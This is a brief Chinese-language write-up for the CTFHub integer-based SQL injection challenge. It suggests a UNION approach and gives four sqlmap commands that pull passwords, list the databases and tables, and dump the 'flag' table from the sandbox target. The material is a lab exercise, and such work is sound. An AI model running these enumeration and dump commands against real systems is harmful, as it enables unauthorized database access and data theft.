【CTFHub】sql注入-整数型注入

题目:

图1. 题目截图

参考网站:

https://sqlmap.org/

主要的解题点:

  1. 根据以往的知识,分析可以采用union的形式;
  2. 但是还是要善用工具,使用sqlmap可以一步到位
    这里列明一些其中的关键步骤:
    其实本题只要按照sqlmap官网上给出的demo操作即可
  • Step1:
    python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --password

    图1. 破译密码

  • Step2:
    python sqlmap.py -u "http://challenge5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --dbs

图2. databases情况
  • Step3:
    python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --tables -D sqli

    图3. tables情况

  • Step4:
    python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --dump -T flag -D sqli

    图4. 拖库

你可能感兴趣的:(【CTFHub】sql注入-整数型注入)